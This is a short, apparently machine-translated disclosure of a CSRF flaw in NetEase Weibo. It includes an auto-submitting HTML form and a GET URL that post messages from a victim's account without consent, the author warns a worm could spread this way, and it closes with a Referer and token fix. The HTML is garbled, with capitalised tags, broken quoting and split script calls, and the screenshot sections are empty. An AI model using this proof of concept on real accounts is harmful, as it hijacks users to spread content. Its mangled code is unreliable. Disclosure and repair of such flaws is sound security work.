Netease Weibo CSRF and repair

A csrf vulnerability in NetEase may cause worms to spread. Weibo is published without the user's consent.
When receiving the POST and GET information, the Referer is not verified, and the token is not added to the POST information to verify the correctness of the information, resulting in a vulnerability.
Vulnerability address:
Http://t.163.com/tweet.do? Action = addTweet
 
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://t.163.com/tweet.do? Action = addTweet "method =" post ">
<Input type = "text" name = "content" value = "XXXXXXXXXXX"/>
<Input type = "submit" value = "submit"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
 
 
Interface return information
 
 


 
 
Effect
 
 
 
 
 
A csrf vulnerability in NetEase may cause worms to spread. Weibo is published without the user's consent.
 
Wish the programmer A Happy zongzi Festival ~
GET mode, so self-evaluation 15
When receiving GET information, no Referer is verified, and the token is not added to GET information to verify the correctness of the information, resulting in a vulnerability.
Vulnerability address:
 
Http://t.163.com/article/updatetweet4zt? Status = [enter the content you want to spread here] & ztsite = duanwu1 & method = add_butter & modulefrom = zt_update & special_site = duanwu1 & keyfrom = op. zt & imageUrl =
 
 
 
Interface return information
 
 
 
 
Effect
 
 
 
Solution: Check the GET and POST referers.
Add token in GET and POST information
Imlonghao author